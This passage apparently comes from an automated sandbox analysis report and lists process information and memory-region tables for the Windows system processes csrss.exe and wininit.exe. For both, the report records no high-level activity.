0x
33C
0x
1DC
0x
1D8
0x
1A8
0x
188
0x
184
0x
180
0x
160
0x
158
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| locale.nls | 0xef80000000 | 0xef800bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ef800c0000 | 0xef800c0000 | 0xef80240fff | Pagefile Backed Memory | r |
|
|
|
- |
| csrss.exe.mui | 0xefec5a0000 | 0xefec5a0fff | Memory Mapped File | r |
|
|
|
- |
| winsrv.dll.mui | 0xefec5b0000 | 0xefec5b1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000efec5c0000 | 0xefec5c0000 | 0xefec5d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000efec5e0000 | 0xefec5e0000 | 0xefec5effff | Pagefile Backed Memory | rw |
|
|
|
- |
| marlett.ttf | 0xefec5f0000 | 0xefec5f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000efec600000 | 0xefec600000 | 0xefec617fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000efec620000 | 0xefec620000 | 0xefec626fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000efec630000 | 0xefec630000 | 0xefec63ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efec640000 | 0xefec640000 | 0xefec640fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efec640000 | 0xefec640000 | 0xefec64ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efec650000 | 0xefec650000 | 0xefec65ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efec660000 | 0xefec660000 | 0xefec66ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000efec670000 | 0xefec670000 | 0xefec6affff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec6b0000 | 0xefec6b0000 | 0xefec6b0fff | Private Memory | rw |
|
|
|
- |
| vgasys.fon | 0xefec6c0000 | 0xefec6c1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000efec6d0000 | 0xefec6d0000 | 0xefec6d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec6e0000 | 0xefec6e0000 | 0xefec6e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec6f0000 | 0xefec6f0000 | 0xefec6f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec700000 | 0xefec700000 | 0xefec7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec800000 | 0xefec800000 | 0xefec83ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec840000 | 0xefec840000 | 0xefec87ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000efec880000 | 0xefec880000 | 0xefec8bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000efec8c0000 | 0xefec8c0000 | 0xefeca47fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000efeca50000 | 0xefeca50000 | 0xefeca8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000efeca90000 | 0xefeca90000 | 0xefecacffff | Private Memory | rw |
|
|
|
- |
| private_0x000000efecad0000 | 0xefecad0000 | 0xefecb0ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0xefecb10000 | 0xefecbeefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000efecbf0000 | 0xefecbf0000 | 0xefecc1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000efecc20000 | 0xefecc20000 | 0xefee01ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000efee020000 | 0xefee020000 | 0xefee02ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee030000 | 0xefee030000 | 0xefee03ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee040000 | 0xefee040000 | 0xefee04ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee050000 | 0xefee050000 | 0xefee05ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee060000 | 0xefee060000 | 0xefee06ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000efee070000 | 0xefee070000 | 0xefee0affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000efee0b0000 | 0xefee0b0000 | 0xefee16ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000efee170000 | 0xefee170000 | 0xefee17ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee180000 | 0xefee180000 | 0xefee23ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000efee240000 | 0xefee240000 | 0xefee24ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee250000 | 0xefee250000 | 0xefee25ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee260000 | 0xefee260000 | 0xefee26ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee270000 | 0xefee270000 | 0xefee27ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee280000 | 0xefee280000 | 0xefee33ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000efee340000 | 0xefee340000 | 0xefee34ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee350000 | 0xefee350000 | 0xefee35ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee350000 | 0xefee350000 | 0xefee350fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee360000 | 0xefee360000 | 0xefee36ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000efee370000 | 0xefee370000 | 0xefee3affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000efee3b0000 | 0xefee3b0000 | 0xefee3b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000efee3c0000 | 0xefee3c0000 | 0xefee3cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| vgaoem.fon | 0xefee3d0000 | 0xefee3d1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000efee3e0000 | 0xefee3e0000 | 0xefee3effff | Pagefile Backed Memory | rw |
|
|
|
- |
| dosapp.fon | 0xefee3f0000 | 0xefee3f8fff | Memory Mapped File | r |
|
|
|
- |
| cga40woa.fon | 0xefee400000 | 0xefee401fff | Memory Mapped File | r |
|
|
|
- |
| cga80woa.fon | 0xefee410000 | 0xefee411fff | Memory Mapped File | r |
|
|
|
- |
| ega40woa.fon | 0xefee420000 | 0xefee422fff | Memory Mapped File | r |
|
|
|
- |
| consola.ttf | 0xefee430000 | 0xefee498fff | Memory Mapped File | r |
|
|
|
- |
| consolab.ttf | 0xefee4a0000 | 0xefee4fafff | Memory Mapped File | r |
|
|
|
- |
| consolai.ttf | 0xefee500000 | 0xefee56afff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ffad0000 | 0x7df5ffad0000 | 0x7ff5ffacffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff753e38000 | 0x7ff753e38000 | 0x7ff753e39fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753e3a000 | 0x7ff753e3a000 | 0x7ff753e3bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753e3c000 | 0x7ff753e3c000 | 0x7ff753e3dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753e3e000 | 0x7ff753e3e000 | 0x7ff753e3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff753e40000 | 0x7ff753e40000 | 0x7ff753f3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007ff753f40000 | 0x7ff753f40000 | 0x7ff753f62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff753f63000 | 0x7ff753f63000 | 0x7ff753f64fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753f65000 | 0x7ff753f65000 | 0x7ff753f66fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753f67000 | 0x7ff753f67000 | 0x7ff753f68fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753f69000 | 0x7ff753f69000 | 0x7ff753f6afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753f6d000 | 0x7ff753f6d000 | 0x7ff753f6efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff753f6f000 | 0x7ff753f6f000 | 0x7ff753f6ffff | Private Memory | rw |
|
|
|
- |
| csrss.exe | 0x7ff7546c0000 | 0x7ff7546c6fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffc54440000 | 0x7ffc544d7fff | Memory Mapped File | rwx |
|
|
|
- |
| sxssrv.dll | 0x7ffc544f0000 | 0x7ffc544fcfff | Memory Mapped File | rwx |
|
|
|
- |
| winsrv.dll | 0x7ffc54500000 | 0x7ffc54534fff | Memory Mapped File | rwx |
|
|
|
- |
| basesrv.dll | 0x7ffc54540000 | 0x7ffc54553fff | Memory Mapped File | rwx |
|
|
|
- |
| csrsrv.dll | 0x7ffc54560000 | 0x7ffc54574fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #44: wininit.exe
0
0
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\windows\system32\wininit.exe |
| Command Line | wininit.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x194 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
224
0x
1D4
0x
1AC
0x
198
|
Process #45: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #45 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x19c |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
848
0x
4B4
0x
2AC
0x
210
0x
20C
0x
1F8
0x
1C8
0x
1C4
0x
1C0
0x
1BC
0x
1B8
0x
1A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| locale.nls | 0xb980000000 | 0xb9800bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b9800c0000 | 0xb9800c0000 | 0xb980240fff | Pagefile Backed Memory | r |
|
|
|
- |
| winsrv.dll.mui | 0xb99cc80000 | 0xb99cc81fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b99cc90000 | 0xb99cc90000 | 0xb99cc9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cca0000 | 0xb99cca0000 | 0xb99ccb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b99ccc0000 | 0xb99ccc0000 | 0xb99cccffff | Pagefile Backed Memory | rw |
|
|
|
- |
| marlett.ttf | 0xb99ccd0000 | 0xb99ccd6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b99cce0000 | 0xb99cce0000 | 0xb99ccf7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b99cd00000 | 0xb99cd00000 | 0xb99cd0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cd10000 | 0xb99cd10000 | 0xb99cd1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cd20000 | 0xb99cd20000 | 0xb99cd2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cd30000 | 0xb99cd30000 | 0xb99cd3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cd40000 | 0xb99cd40000 | 0xb99cd40fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cd50000 | 0xb99cd50000 | 0xb99cd50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b99cd60000 | 0xb99cd60000 | 0xb99cd60fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99cd70000 | 0xb99cd70000 | 0xb99cd76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99cd80000 | 0xb99cd80000 | 0xb99cdbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99cdc0000 | 0xb99cdc0000 | 0xb99cdc1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99cdd0000 | 0xb99cdd0000 | 0xb99cdd0fff | Private Memory | rw |
|
|
|
- |
| vgasys.fon | 0xb99cde0000 | 0xb99cde1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b99cdf0000 | 0xb99cdf0000 | 0xb99cdf0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99ce00000 | 0xb99ce00000 | 0xb99cefffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cf00000 | 0xb99cf00000 | 0xb99cf0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cf10000 | 0xb99cf10000 | 0xb99cf1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cf20000 | 0xb99cf20000 | 0xb99cf2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| segmdl2.ttf | 0xb99cf30000 | 0xb99cf53fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b99cf60000 | 0xb99cf60000 | 0xb99cf60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cf70000 | 0xb99cf70000 | 0xb99cfa8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cfb0000 | 0xb99cfb0000 | 0xb99cfbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99cfc0000 | 0xb99cfc0000 | 0xb99cfcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b99cfd0000 | 0xb99cfd0000 | 0xb99d00ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d010000 | 0xb99d010000 | 0xb99d01ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d020000 | 0xb99d020000 | 0xb99d02ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d030000 | 0xb99d030000 | 0xb99d03ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d040000 | 0xb99d040000 | 0xb99d040fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d050000 | 0xb99d050000 | 0xb99d05ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d060000 | 0xb99d060000 | 0xb99d06ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| vgaoem.fon | 0xb99d070000 | 0xb99d071fff | Memory Mapped File | r |
|
|
|
- |
| dosapp.fon | 0xb99d080000 | 0xb99d088fff | Memory Mapped File | r |
|
|
|
- |
| cga40woa.fon | 0xb99d090000 | 0xb99d091fff | Memory Mapped File | r |
|
|
|
- |
| cga80woa.fon | 0xb99d0a0000 | 0xb99d0a1fff | Memory Mapped File | r |
|
|
|
- |
| ega40woa.fon | 0xb99d0b0000 | 0xb99d0b2fff | Memory Mapped File | r |
|
|
|
- |
| consola.ttf | 0xb99d0c0000 | 0xb99d128fff | Memory Mapped File | r |
|
|
|
- |
| consolab.ttf | 0xb99d130000 | 0xb99d18afff | Memory Mapped File | r |
|
|
|
- |
| consolai.ttf | 0xb99d190000 | 0xb99d1fafff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b99d200000 | 0xb99d200000 | 0xb99d20ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d210000 | 0xb99d210000 | 0xb99d21ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d220000 | 0xb99d220000 | 0xb99d22ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d230000 | 0xb99d230000 | 0xb99d23ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d240000 | 0xb99d240000 | 0xb99d24ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d250000 | 0xb99d250000 | 0xb99d25ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d260000 | 0xb99d260000 | 0xb99d26ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d270000 | 0xb99d270000 | 0xb99d27ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d280000 | 0xb99d280000 | 0xb99d28ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d290000 | 0xb99d290000 | 0xb99d29ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d2a0000 | 0xb99d2a0000 | 0xb99d2affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d2b0000 | 0xb99d2b0000 | 0xb99d2bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d2c0000 | 0xb99d2c0000 | 0xb99d2c4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d2d0000 | 0xb99d2d0000 | 0xb99d2dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d2e0000 | 0xb99d2e0000 | 0xb99d2effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d2f0000 | 0xb99d2f0000 | 0xb99d2fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d300000 | 0xb99d300000 | 0xb99d304fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d310000 | 0xb99d310000 | 0xb99d314fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d320000 | 0xb99d320000 | 0xb99d32ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d330000 | 0xb99d330000 | 0xb99d334fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d340000 | 0xb99d340000 | 0xb99d344fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d350000 | 0xb99d350000 | 0xb99d35ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d360000 | 0xb99d360000 | 0xb99d36ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d370000 | 0xb99d370000 | 0xb99d37ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d380000 | 0xb99d380000 | 0xb99d38ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d390000 | 0xb99d390000 | 0xb99d39ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d3a0000 | 0xb99d3a0000 | 0xb99d3affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d3b0000 | 0xb99d3b0000 | 0xb99d3bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d3c0000 | 0xb99d3c0000 | 0xb99d3cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d3d0000 | 0xb99d3d0000 | 0xb99d3dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d3e0000 | 0xb99d3e0000 | 0xb99d3effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d3f0000 | 0xb99d3f0000 | 0xb99d3fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b99d400000 | 0xb99d400000 | 0xb99d43ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99d440000 | 0xb99d440000 | 0xb99d47ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99d480000 | 0xb99d480000 | 0xb99d4bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b99d4c0000 | 0xb99d4c0000 | 0xb99d647fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b99d650000 | 0xb99d650000 | 0xb99d68ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99d690000 | 0xb99d690000 | 0xb99d6cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99d6d0000 | 0xb99d6d0000 | 0xb99d70ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0xb99d710000 | 0xb99d7eefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b99d7f0000 | 0xb99d7f0000 | 0xb99d81ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b99d820000 | 0xb99d820000 | 0xb99ec1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b99ec20000 | 0xb99ec20000 | 0xb99ec5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99ec60000 | 0xb99ec60000 | 0xb99ec60fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b99ec70000 | 0xb99ec70000 | 0xb99ec70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b99ec80000 | 0xb99ec80000 | 0xb99ec8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99ec90000 | 0xb99ec90000 | 0xb99ec9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b99eca0000 | 0xb99eca0000 | 0xb99ecdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b99ece0000 | 0xb99ece0000 | 0xb99f1d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f1e0000 | 0xb99f1e0000 | 0xb99f1effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f1f0000 | 0xb99f1f0000 | 0xb99f1fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f200000 | 0xb99f200000 | 0xb99f20ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f210000 | 0xb99f210000 | 0xb99f21ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f210000 | 0xb99f210000 | 0xb99f210fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f220000 | 0xb99f220000 | 0xb99f22ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f230000 | 0xb99f230000 | 0xb99f23ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f240000 | 0xb99f240000 | 0xb99f24ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f250000 | 0xb99f250000 | 0xb99f25ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f260000 | 0xb99f260000 | 0xb99f26ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f270000 | 0xb99f270000 | 0xb99f27ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f270000 | 0xb99f270000 | 0xb99f270fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f280000 | 0xb99f280000 | 0xb99f28ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f290000 | 0xb99f290000 | 0xb99f29ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f2a0000 | 0xb99f2a0000 | 0xb99f2affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f2b0000 | 0xb99f2b0000 | 0xb99f2bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f2c0000 | 0xb99f2c0000 | 0xb99f2cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f2d0000 | 0xb99f2d0000 | 0xb99f2dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f2e0000 | 0xb99f2e0000 | 0xb99f2effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f2f0000 | 0xb99f2f0000 | 0xb99f2fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f300000 | 0xb99f300000 | 0xb99f30ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f310000 | 0xb99f310000 | 0xb99f31ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f320000 | 0xb99f320000 | 0xb99f32ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f330000 | 0xb99f330000 | 0xb99f33ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f340000 | 0xb99f340000 | 0xb99f34ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b99f3e0000 | 0xb99f3e0000 | 0xb99f5defff | Pagefile Backed Memory | rw |
|
|
|
- |
| segoeuib.ttf | 0xb99f6e0000 | 0xb99f7bbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b99f7c0000 | 0xb99f7c0000 | 0xb99f9befff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff700000 | 0x7df5ff700000 | 0x7ff5ff6fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7544b4000 | 0x7ff7544b4000 | 0x7ff7544b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7544b6000 | 0x7ff7544b6000 | 0x7ff7544b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7544b8000 | 0x7ff7544b8000 | 0x7ff7544b9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7544ba000 | 0x7ff7544ba000 | 0x7ff7544bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7544bc000 | 0x7ff7544bc000 | 0x7ff7544bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7544be000 | 0x7ff7544be000 | 0x7ff7544bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7544c0000 | 0x7ff7544c0000 | 0x7ff7545bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7545c0000 | 0x7ff7545c0000 | 0x7ff7545e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7545e4000 | 0x7ff7545e4000 | 0x7ff7545e5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7545e6000 | 0x7ff7545e6000 | 0x7ff7545e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7545e8000 | 0x7ff7545e8000 | 0x7ff7545e8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7545ea000 | 0x7ff7545ea000 | 0x7ff7545ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7545ee000 | 0x7ff7545ee000 | 0x7ff7545effff | Private Memory | rw |
|
|
|
- |
| csrss.exe | 0x7ff7546c0000 | 0x7ff7546c6fff | Memory Mapped File | rwx |
|
|
|
- |
